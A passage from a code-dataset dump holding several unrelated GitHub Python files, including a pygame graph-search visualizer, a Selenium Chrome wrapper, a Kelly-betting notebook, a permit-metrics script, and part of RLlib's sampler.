TextBox(box.centerx, box.centery + 12, hight=16, border= False, active=(255,255,255), allowZero= True)\n\n pygame.draw.rect(self.surface, (255,255,255), box)\n pygame.draw.rect(self.surface, (0,0,0), box, width = 3)\n\n self.surface.blit(prompt_surf, prompt_rect)\n\n tb.render(self.surface, self.font)\n \n\n pygame.draw.line(self.surface, (0,0,0), (box.left + 50, box.bottom - 15), (box.right - 50, box.bottom - 15), 3)\n \n return (tb.takeInput(self.surface, self.screen, self.font))\n \n\n def runAlgorithm(self, panel, grid_surf, algorithm, speed, max_depth = -1):\n loop = True\n start_state = None\n goal_states = []\n message = \"\"\n cost = 0\n\n message = \"Please select ONE START state\"\n while(loop):\n mouse = pygame.mouse.get_pos()\n\n #$ Event Loop\n for event in pygame.event.get(): \n #$ QUIT event\n if (event.type == pygame.QUIT):\n loop = False\n pygame.quit()\n sys.exit()\n if(event.type == pygame.MOUSEBUTTONDOWN):\n self.edge_sound.play()\n if(panel.mouseOnPanel(mouse)):\n\n if (panel.showH_btn.detect_click()):\n self.showHeuristic = panel.showH_btn.detect_toggle()\n \n elif (panel.speed_btn.detect_click()):\n speed = panel.speed_control()\n\n elif (panel.showC_btn.detect_click()):\n self.showCost = panel.showC_btn.detect_toggle()\n\n elif (panel.play_btn.detect_click()):\n if (start_state is not None and len(goal_states) > 0):\n panel.play_btn.detect_toggle()\n self.reset_nodes()\n \n self.updateScreen(panel)\n\n if (algorithm == \"BFS\"):\n cost = self.BFS(start_state, goal_states, speed)\n\n elif (algorithm == \"UCS\"):\n cost = self.UCS(start_state, goal_states, speed)\n\n elif (algorithm == \"DFS\"):\n cost = self.DFS(start_state, goal_states, speed)\n\n elif (algorithm == \"ITD\"):\n cost = self.ITD(start_state, goal_states, speed, max_depth)\n\n elif (algorithm == \"DLS\"):\n cost = self.DLS(start_state, goal_states, speed, max_depth)\n\n elif (algorithm == \"GRY\"):\n cost = self.GRDY(start_state, goal_states, speed)\n\n elif (algorithm == \"AST\"):\n cost = self.ASRT(start_state, goal_states, speed)\n\n message2 = f\"Start state {start_state} nl Goal stats {list(map(lambda x: x.state, goal_states))}\"\n \n if(max_depth != -1):\n message2 += f\" nl Max Depth {max_depth}\"\n\n message =\"Algorithm has finished execution nl \" + message2 + f\" nl Total Cost to goal {cost}. nl Press `Play` to run the algorithm again or nl Press stop search to return back to drawing.\"\n\n # elif (panel.speed_btn.detect_click()):\n # speed = panel.speed_control()\n\n elif(panel.stop_btn.detect_click()):\n panel.play_btn.toggled = False\n loop = False\n self.reset_nodes()\n start_state = None\n goal_states = []\n return True\n\n else: #$ If click on canvas\n node = self.start_goal_states(mouse)\n if (node is not None):\n if (start_state is None):\n message = \"Please select at least one GOAL state. nl Then press PLAY SEARCH to begin.\"\n node.color = Node.start_state_color\n node.type = \"S\"\n start_state = node\n elif(start_state is not node):\n node.color = Node.goal_state_color\n node.type = \"G\"\n goal_states.append(node)\n \n panel.fill()\n self.surface.fill((255, 255, 255))\n self.surface.blit(grid_surf, (0,0))\n \n\n panel.btnDetect_hover(mouse)\n panel.draw_btns()\n panel.displayMessage(message)\n\n self.draw_edges()\n self.draw_nodes(mouse)\n \n self.updateScreen(panel)\n\n\n def updateScreen(self, panel):\n self.screen.blit(self.surface, (0,0))\n if (panel != 0):\n self.screen.blit(panel.panel_surf, (panel.cordX, panel.cordY))\n pygame.display.update()\n\n\n def BFS(self, start_state, goal_states, speed = 750):\n print(\"BFS Search RUN\")\n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = [root]\n visited = []\n goal = goal_states\n current = None\n state_fringe = []\n\n while(len(fringe) > 0):\n for event in pygame.event.get():\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe) \n current = fringe[0]\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n visited.append(current)\n fringe = fringe[1:]\n\n current.color = Node.current_node_color\n if current in goal:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n \n for adj in current.adjacent:\n if adj[0] not in visited and adj[0] not in fringe:\n adj[0].color = Node.in_fringe_color\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0]) \n\n self.draw_edges()\n self.draw_nodes((0,0))\n self.screen.blit(self.surface, (0,0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def DFS(self, start_state, goal_states, speed = 750):\n print(\"DFS Search RUN\")\n pygame.event.clear()\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n while (len(fringe) > 0):\n\n # print(pygame.event.get() )\n for event in pygame.event.get():\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n print(state_fringe) \n\n current = fringe.pop()\n\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def UCS(self, start_state, goal_states, speed = 750):\n print(\"UCS Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = PriorityQueue()\n fringe.add(root, 0)\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n fringe.display_queue()\n \n current = fringe.pop() \n visited.append(current)\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n betterSol = current.total_cost + adj[1].weight < adj[0].total_cost\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n\n if (adj[0].parent is None):\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight \n fringe.add(adj[0], adj[0].total_cost)\n visited.append(adj[0])\n adj[0].color = Node.in_fringe_color\n\n elif fringe.inside(adj[0]) and betterSol:\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n fringe.replace((adj[0], adj[0].total_cost))\n fringe.add(adj[0], adj[0].total_cost)\n adj[0].color = Node.in_fringe_color\n\n \n\n current.color = Node.current_node_color\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def GRDY(self, start_state, goal_states, speed = 750):\n print(\"Greedy Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n fringe = PriorityQueue()\n fringe.add(root, root.heuristic) # the counter is used to differentiate between elements with the same weight\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n print(\">\") \n fringe.display_queue()\n\n current = fringe.pop()\n visited.append(current)\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n adj[0].parent = current\n print(\">>\") \n fringe.display_queue()\n fringe.add(adj[0], adj[0].heuristic)\n print(\">>>\") \n fringe.display_queue()\n adj[0].color = Node.in_fringe_color\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def ASRT(self, start_state, goal_states, speed = 750):\n print(\"A* Search RUN\")\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n root = start_state\n root.update_f_cost()\n counter = 0\n fringe = PriorityQueue()\n fringe.add(root, root.f_cost) # the counter is used to differentiate between elements with the same weight\n visited = []\n\n while not fringe.empty():\n for event in pygame.event.get():\n if event.type == speed_event:\n fringe.display_queue(True)\n\n current = fringe.pop()\n visited.append(current)\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n for adj in current.adjacent:\n betterSol = current.total_cost + adj[1].weight + adj[0].heuristic < adj[0].f_cost\n\n if (adj[0] not in visited) and not(fringe.inside(adj[0])):\n\n if (adj[0].parent is None):\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n adj[0].update_f_cost() \n fringe.add(adj[0], adj[0].f_cost)\n visited.append(adj[0])\n adj[0].color = Node.in_fringe_color\n\n elif fringe.inside(adj[0]) and betterSol:\n adj[0].parent = current\n adj[0].total_cost = adj[0].parent.total_cost + adj[1].weight\n adj[0].update_f_cost()\n \n fringe.add(adj[0], adj[0].f_cost)\n adj[0].color = Node.in_fringe_color\n\n\n current.color = Node.current_node_color\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def ITD(self, start_state, goal_states, speed = 750, cycles = 1):\n print(\"Iterative Deeping Search RUN\") \n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n max_depth = 1\n cycles += 1\n while(cycles > 0):\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n current_depth = 0\n self.reset_nodes()\n\n while (len(fringe) > 0):\n\n for event in pygame.event.get():\n\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe)\n\n current = fringe.pop()\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n current_depth = current.get_hight() + 1\n\n if (current_depth < max_depth):\n\n for adj in current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n \n cycles -= 1\n max_depth += 1\n \n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def DLS(self, start_state, goal_states, speed = 750, cycles = 1):\n print(\"Depth Limited Search RUN\") \n\n speed_event = pygame.USEREVENT + 1\n pygame.time.set_timer(speed_event, speed)\n\n cycles += 1\n max_depth = cycles\n print(max_depth)\n root = start_state\n fringe = []\n fringe.append(root)\n visited = []\n\n current_depth = 0\n self.reset_nodes()\n\n while (len(fringe) > 0):\n\n for event in pygame.event.get():\n\n if event.type == speed_event:\n state_fringe = list(map(lambda x: x.state, fringe))\n\n print(state_fringe) \n\n current = fringe.pop()\n\n if (current.parent is not None):\n current.getEdgeFromParent().color = (117, 116, 115)\n\n visited.append(current)\n\n current.color = Node.current_node_color\n\n if current in goal_states:\n current.color = Node.goal_state_color\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return self.path_to_goal(current)\n\n current_depth = current.get_hight() + 1\n # print(current, current_depth)\n\n if (current_depth < max_depth):\n\n for adj in current.adjacent:\n if adj[0] not in visited:\n adj[0].color = Node.in_fringe_color\n\n if (adj[0] not in fringe):\n adj[0].parent = current\n fringe.append(adj[0])\n\n\n self.draw_edges()\n self.draw_nodes((0, 0))\n self.screen.blit(self.surface, (0, 0))\n pygame.display.update()\n\n current.color = Node.visited_color\n\n pygame.event.clear()\n pygame.time.set_timer(speed_event, 0)\n return False\n\n\n def reset_nodes(self):\n for node in self.nodes:\n node.color = Node.default_color\n node.total_cost = 0\n node.parent = None\n node.type = \"\"\n\n for edge in self.edges:\n edge.color = (0,0,0)","repo_name":"KAYounes/AIProject","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40798407748","text":"from typing import Any\n\nimport subprocess\nimport time\n\nimport pyperclip\n\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .config import *\n\n\n__all__ = [\n \"ChromeDriver\",\n]\n\n\ndef load_driver() -> Chrome:\n subprocess.Popen(r'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe '\n r'--remote-debugging-port=9222 --user-data-dir=\"C:\\chrometemp\"')\n\n options = Options()\n options.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n\n driver = Chrome(\n options=options,\n service=Service(ChromeDriverManager().install()),\n )\n\n return driver\n\n\nclass ChromeDriver:\n def __init__(\n self,\n time_to_wait: float = default_wait,\n time_to_sleep: float = default_sleep,\n ) -> None:\n self.time_to_wait = time_to_wait\n self.time_to_sleep = time_to_sleep\n\n self.driver = load_driver()\n\n def close_driver(\n self,\n ) -> None:\n self.driver.close()\n self.driver.quit()\n\n def wait(\n self,\n ) -> None:\n self.driver.implicitly_wait(self.time_to_wait)\n time.sleep(self.time_to_sleep)\n\n def go(\n self,\n url: str,\n ) -> None:\n self.driver.get(url)\n\n self.wait()\n\n def current_url(\n self,\n ) -> str:\n return str(self.driver.current_url)\n\n def get_element(\n self,\n find_element_by: str,\n element_value: str,\n ) -> Any:\n element = self.driver.find_element(\n by=getattr(By, find_element_by),\n value=element_value,\n )\n\n return element\n\n def get_elements(\n self,\n find_elements_by: str,\n elements_value: str,\n ) -> Any:\n elements = self.driver.find_elements(\n by=getattr(By, find_elements_by),\n value=elements_value,\n )\n\n return elements\n\n def does_element_exist(\n self,\n find_element_by: str,\n element_value: str,\n ) -> bool:\n try:\n self.driver.find_element(\n by=getattr(By, find_element_by),\n value=element_value,\n )\n\n except NoSuchElementException:\n return False\n\n return True\n\n def click(\n self,\n find_element_by: str,\n element_value: str,\n ) -> None:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n element.click()\n\n self.wait()\n\n def input(\n self,\n find_element_by: str,\n element_value: str,\n input_value: str,\n ) -> None:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n element.clear()\n\n element.click()\n pyperclip.copy(input_value)\n element.send_keys(Keys.CONTROL, \"v\")\n\n self.wait()\n\n def get_value(\n self,\n find_element_by: str,\n element_value: str,\n element_attribute: str,\n ) -> Any:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n return element.get_attribute(element_attribute)\n\n def get_text(\n self,\n find_element_by: str,\n element_value: str,\n ) -> Any:\n element = self.get_element(\n find_element_by=find_element_by,\n element_value=element_value,\n )\n\n return element.text\n","repo_name":"yupeeee/YupTools","sub_path":"src/yuptools/web/chrome/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11544316046","text":"# %%\nimport datetime as dt\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport plotly.io as pio\nimport seaborn as sns\nimport statsmodels as sm\n\npd.options.plotting.backend = \"plotly\"\npio.templates.default = 'plotly_dark'\npio.renderers.default = 'notebook_connected'\n\nsns.set_style('darkgrid')\n# sns.style.use('seaborn-deep')\nplt.rcParams['figure.dpi'] = 150\n\n\n# %%\ndef kelly(p, w=1, l=1):\n return p / l - (1 - p) / w\n\n\nkelly(0.7)\n\n# %% [markdown]\n# ## Probability matching is suboptimal\n#\n# Below we examine the case of an individual playing a game with the following rules:\n# - *n* iterations\n# - each iteration is a flip of a biased coin with $p = 0.8$\n# - in each iteration, an individual bets \\\\$1 on either H or T. They lose their bet if they are wrong, win their bet if they are right.\n# Obviously the dominant strategy is to bet \\\\$1 on H every time if $p > 0.5$, else bet \\\\$1 on $T$ every time.\n# Probability matching\" is the observed bias in which people tend to bet H with a frequency approx equal to the probability of H, i.e betting heads 80% of the time.\n# Consider a situation where the coin has known bias $p >= 0.5$ and we bet heads with frequency $f$. Elementary arithmetic shows that the EV per iteration is $1 - 2(f+p-2fp)$.\n# In the \"\\optimal\"\\ case $f=1$, we recover $EV = 2p-1$. Probability matching yields $(2p-1)^2$.\n\n# %%\n# Analysis\nps = np.linspace(0.5, 1, 100)\ndf = pd.DataFrame({\n \"optimal\": 2 * ps - 1,\n \"matching\": (2 * ps - 1)**2\n},\n index=ps)\ndf.plot()\n\n# %% [markdown]\n# For a given true probability, you can see that the EV is linear in f. e.g if $p = 0.8$\n# you end up with $EV = 1.2f - 0.6$\n# This is verified via simulation (below)\n\n# %%\n\n\ndef flips(p=0.5, n=10_000):\n # codes H/T as +/- 1\n a = np.random.binomial(1, p, (n, ))\n return np.where(a == 0, -1, a)\n\n\n# %%\n\ntrue_prob = 0.8\ns_prob = 1\ny = flips(true_prob)\ns = flips(s_prob)\n\n\ndef eval_strategy(s_prob, true_prob=0.8, n=10_000):\n y = flips(true_prob, n)\n s = flips(s_prob, n)\n return (y * s).cumsum()\n\n\n# %%\n\nn = 100_000\nps = np.arange(0.5, 1.0, 0.05)\nres = []\nfor s_prob in ps:\n res.append(eval_strategy(s_prob, 0.8, n)[-1] / n)\n\npd.DataFrame({\"analytical\": 1.2 * ps - 0.6, \"sim\": res}, index=ps).plot()\n# %%\n\n# plot out wealth growth\nps = np.arange(0.5, 1.0, 0.05)\nres = {}\nfor s_prob in ps:\n res[f\"{s_prob:.2f}\"] = eval_strategy(s_prob, 0.8, 1000)\n\npd.DataFrame(res).plot()\n# %%\n\n\ndef kelly_fraction(p, W):\n return p - (1 - p) / W\n\n\nWs = np.linspace(0.5, 10, 100)\nfs = kelly_fraction(0.75, Ws)\n\nfig, ax = plt.subplots()\nax.plot(Ws, fs, label='kelly')\nax.set_ylim(0.4, 1)\nax.axhline(0.75,\n xmin=0,\n xmax=9,\n color='k',\n linestyle='--',\n label='prob matching')\nax.set_xlabel('W')\nax.set_ylabel('f*')\nax.legend()\nplt.show()\n\n# %%\n\nkelly_fraction(0.75, 5)\n# 0.7\n# %%\n\n\ndef kelly_simul(true_prob=0.8, n=100_000):\n y = flips(true_prob, n)\n\n\n# %%\n\ny = flips(true_prob, n)\nprint(f\"{y}\")\n# y is an array([1, 1, 1, ..., -1, 1, 1])\n","repo_name":"eo1989/mkt_stats_notes","sub_path":"probabilitymatching_kellybetting.py","file_name":"probabilitymatching_kellybetting.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71421631786","text":"# IMPORT\nimport pandas as pd\nimport os\nimport datetime\nimport numpy as np\n\nnp.warnings.filterwarnings('ignore', category=np.VisibleDeprecationWarning) \n\npd.options.mode.chained_assignment = None\n\n\n# ADMIN FUNCTIONS\n\ndef get_holidays(holiday_path=r'data\\raw_data\\City_Holidays.xlsx'):\n return set([\n pd.Timestamp(h) \n for h in pd.read_excel(holiday_path)['date'].unique()\n ])\nholidays = get_holidays()\n\n# PLANNER FUNCTIONS\n\nplanner_initials = {\n 'ABC': 'Alan Carreon',\n 'AS': 'Ana Spinola',\n 'AMS': 'Andrew Smith',\n 'CG': 'Chip Griffin',\n 'EB': 'Ethan T Bindernagel',\n 'GDK': 'Greg Kapovich',\n 'GV': 'Gerardo Victoria',\n 'HEC': 'Haley E Croffoot',\n 'HH': 'Haley Hubbard',\n 'JG': 'Jessica J Gonzalez',\n 'JCav': 'Jeanine Cavalli',\n 'KN': 'Ken Nodder',\n 'OA': 'Ozzy Arce',\n 'SKG': 'Simar Gill',\n 'SP': 'Sukhamrit S Purewal',\n 'TC': 'Trishia Caguiat'\n}\nplanner_names = {v:k for k,v in planner_initials.items()}\nplanner_names['Haley Hubbard'] = 'HEC'\nplanner_initials['HH'] = 'Haley E Croffoot'\n\n\n# ENTITLEMENTS\n\n#Complete_Closed = ['Approved - Closed', 'Closed', 'Not Approved - Closed']\n#Planner_Closed = ['Close Out', 'Approved', 'Not Approved']\nEnt = {\n 'Zoning Amendment': 'Amend',\n 'Use Permit Minor': 'MUP',\n 'Design Review': 'DR',\n 'Design Review Oversized Home': 'DR',\n 'Design Review Other': 'DR',\n 'Design Review Commercial': 'DR',\n 'General Plan Amendment': 'Amend',\n 'Design Review Antenna': 'DR',\n 'Design Review Residential': 'DR',\n 'Use Permit Conditional': 'CUP',\n 'Use Permit Administrative': 'AUP',\n 'ZCL':'ZCL',\n 'Variance': 'Vari',\n 'Rezoning': 'ReZone',\n 'Tree Dripline Encroachment': 'Tree',\n 'Tree Removal Permit': 'Tree',\n '': 'Other',\n 'Other': 'Other',\n 'Tentative Map Major Subdivision': 'Maj Sub',\n 'Drip Line Encroachment': 'Other',\n 'Tentative Map Minor Subdivision': 'Min Sub',\n 'Tentative Map Condo Conversion': 'Conv',\n 'Hillside Performance Standards': 'Other'}\nEnt_names = {v:k for k,v in Ent.items()}\nEnt_names['Other'] = 'Other'\n\n\n# PERMIT TYPES\n\nBUILD = {\n 'Application Submittal - Route':'Start',\n 'Consolidated Comments - With Customer for Response':'Round_End',\n 'Resubmittal or Revision - Route':'Round_Start',\n #'Building Review - Notes':'Pause',\n 'Ready to Issue - Conditionally Approved':'End',\n 'Ready to Issue - Issued':'End',\n 'Ready to Issue - Approved':'End'\n}\n\nSDP = {\n 'Status - Received':'Start',\n 'Application Submittal - Route':'Start',\n 'Consolidated Comments - With Customer for Response':'Round_End',\n 'Consolidated Comments - Resubmittal':'Round_Start',\n #'Consolidated Comments - Ready to Issue': 'Round_Start',\n #'Status - Approved':'End'\n 'Ready to Issue - Issue':'End'\n #'Application Submittal - Ready to Issue':'End'\n}\n\nPLAN_30 = {\n 'Status - Received':'Start',\n 'Intake Review - Application Accepted':'Start',\n 'Consolidated Comments - Deemed Incomplete':'Round_End',\n 'Resubmittal - Route for Review':'Round_Start',\n 'Consolidated Comments - Deemed Complete':'End',\n 'Staff Analysis - Set for Hearing':'End',\n 'Staff Analysis - Staff Level Decision':'End'\n}\n\n# decision types\npath = r'data\\clean_data\\entitlement_info.xlsx'\n# open xlsx file as df and make first row the column names\nent_df = pd.read_excel(path, header=1) \\\n [['Permit Type', 'Entitlement?', 'Public Hearing?']]\n\npub_hearing_permit_types = \\\n ent_df[ent_df['Public Hearing?']=='YES']['Permit Type'].unique()\n\nstaff_decision_permit_types = \\\n ent_df[ent_df['Public Hearing?']=='NO']['Permit Type'].unique()\n\n# other decision indicators\nstaff_dec_ts = [\n 'Staff Level Decision - Approved'\n]\npublic_dec_ts = [\n 'Staff Level Decision - Appealed'\n ]\n\npublic_dec_t = [\n 'Design Review Commission', 'Planning Commission', \n 'Zoning Administrator', 'City Council'\n]\nboard_dec_t = [\n t for t in public_dec_t if t != 'Zoning Administrator'\n]\n\n\n# BAD PERMITS?\nbad = [\n 'Y18-031', # resub after PC decision\n 'Y18-036', # inconsistent starts\n 'Y18-072',\n 'Y18-013', # CEQA caused odd resubmittal\n 'Y18-039', # CEQA problem\n 'Y18-058', # resub after PC decision\n 'Y18-066', # missing resubmittal\n 'Y18-088', # missing resubmittal\n 'Y19-010', # resub after PC decision\n 'Y19-020', # appealed then resub\n 'Y19-041', # weird ordering of resubmittal\n 'Y19-057', # resub after staff & PC decision\n 'Y19-110', # resub after PC decision\n 'Y19-122', # resub after PC decision\n 'Y19-123', # resub after PC decision\n 'Y19-140', # withdrawn\n 'Y21-011', # missing resubmittal, \n 'Y21-053', # weird multi deemed incomplete with DRC in the front\n 'Y21-065', # missing resubmittal\n 'Y21-099', # missing resubmittal\n 'Y21-111',\n 'Y21-114', # missing resubmittal\n 'Y21-033', # missing resubmittal\n ''\n]\nsorta_bad = [\n 'Y19-123',\n 'Y20-052',\n 'Y21-011', # round end, review, round end\n 'Y20-040', # design review continued?\n 'Y19-122', # review after comm\n \n ''\n]","repo_name":"nelmsal/WC_Accela_Permit_Metrics","sub_path":"python/functions/permits.py","file_name":"permits.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70982724269","text":"\nfrom fedrec.communications.messages import ProcMessage\nimport logging\n\nfrom fedrec.communications.comm_manager import (CommunicationManager,\n tag_reciever)\n\n\nclass WorkerComManager(CommunicationManager):\n def __init__(self, trainer, worker_id, config_dict):\n super().__init__(config_dict=config_dict)\n self.trainer = trainer\n self.round_idx = 0\n self.id = worker_id\n\n def run(self):\n super().run()\n\n async def send_message_get_models(self, receive_id, global_model_params, client_index):\n logging.info(\n \"send_message_sync_model_to_client. receive_id = %d\" % receive_id)\n message = Message(\n MyMessage.MSG_TYPE_S2C_SYNC_MODEL_TO_CLIENT, self.get_sender_id(), receive_id)\n message.add_params(\n MyMessage.MSG_ARG_KEY_MODEL_PARAMS, global_model_params)\n message.add_params(\n MyMessage.MSG_ARG_KEY_CLIENT_INDEX, str(client_index))\n return self.send_message(message, block=True)\n\n def send_model(self, receive_id, weights, local_sample_num):\n message = Message(\n MyMessage.MSG_TYPE_C2S_SEND_MODEL_TO_SERVER, self.get_sender_id(), receive_id)\n message.add_params(MyMessage.MSG_ARG_KEY_MODEL_PARAMS, weights)\n message.add_params(MyMessage.MSG_ARG_KEY_NUM_SAMPLES, local_sample_num)\n self.send_message(message)\n","repo_name":"vkkhare/RecoEdge","sub_path":"fedrec/communications/worker_manager.py","file_name":"worker_manager.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21048438595","text":"from typing import Sequence\n\nfrom ..types import IntBinarySample, IntBinary\nfrom .perturbation import RandomPerturbation\n\n\nclass NullPerturbation(RandomPerturbation[IntBinarySample, IntBinary]):\n \"\"\"A perturbation that returns the input unchanged\"\"\"\n\n def __call__(self, input: IntBinarySample) -> IntBinary:\n super().__call__(input)\n binaries, metadata = input\n return binaries\n\n def certified_radius(\n self,\n input: IntBinarySample,\n pred: int,\n counts: Sequence[int],\n alpha: float = 0.05,\n **kwargs,\n ) -> float:\n return 0\n","repo_name":"Dovermore/randomized-deletion","sub_path":"src/torchmalware/certification/null_perturbation.py","file_name":"null_perturbation.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35764812430","text":"from abc import abstractmethod, ABCMeta\nfrom collections import defaultdict, namedtuple\nimport logging\nimport numpy as np\nimport queue\nimport threading\nimport time\n\nfrom ray.util.debug import log_once\nfrom ray.rllib.evaluation.episode import MultiAgentEpisode\nfrom ray.rllib.evaluation.rollout_metrics import RolloutMetrics\nfrom ray.rllib.evaluation.sample_batch_builder import \\\n MultiAgentSampleBatchBuilder\nfrom ray.rllib.policy.policy import clip_action\nfrom ray.rllib.policy.tf_policy import TFPolicy\nfrom ray.rllib.env.base_env import BaseEnv, ASYNC_RESET_RETURN\nfrom ray.rllib.env.atari_wrappers import get_wrapper_by_cls, MonitorEnv\nfrom ray.rllib.offline import InputReader\nfrom ray.rllib.utils import try_import_tree\nfrom ray.rllib.utils.annotations import override, DeveloperAPI\nfrom ray.rllib.utils.debug import summarize\nfrom ray.rllib.utils.spaces.space_utils import flatten_to_single_ndarray, \\\n unbatch\nfrom ray.rllib.utils.tf_run_builder import TFRunBuilder\n\ntree = try_import_tree()\n\nlogger = logging.getLogger(__name__)\n\nPolicyEvalData = namedtuple(\"PolicyEvalData\", [\n \"env_id\", \"agent_id\", \"obs\", \"info\", \"rnn_state\", \"prev_action\",\n \"prev_reward\"\n])\n\n\nclass PerfStats:\n \"\"\"Sampler perf stats that will be included in rollout metrics.\"\"\"\n\n def __init__(self):\n self.iters = 0\n self.env_wait_time = 0.0\n self.processing_time = 0.0\n self.inference_time = 0.0\n\n def get(self):\n return {\n \"mean_env_wait_ms\": self.env_wait_time * 1000 / self.iters,\n \"mean_processing_ms\": self.processing_time * 1000 / self.iters,\n \"mean_inference_ms\": self.inference_time * 1000 / self.iters\n }\n\n\n@DeveloperAPI\nclass SamplerInput(InputReader, metaclass=ABCMeta):\n \"\"\"Reads input experiences from an existing sampler.\"\"\"\n\n @override(InputReader)\n def next(self):\n batches = [self.get_data()]\n batches.extend(self.get_extra_batches())\n if len(batches) > 1:\n return batches[0].concat_samples(batches)\n else:\n return batches[0]\n\n @abstractmethod\n @DeveloperAPI\n def 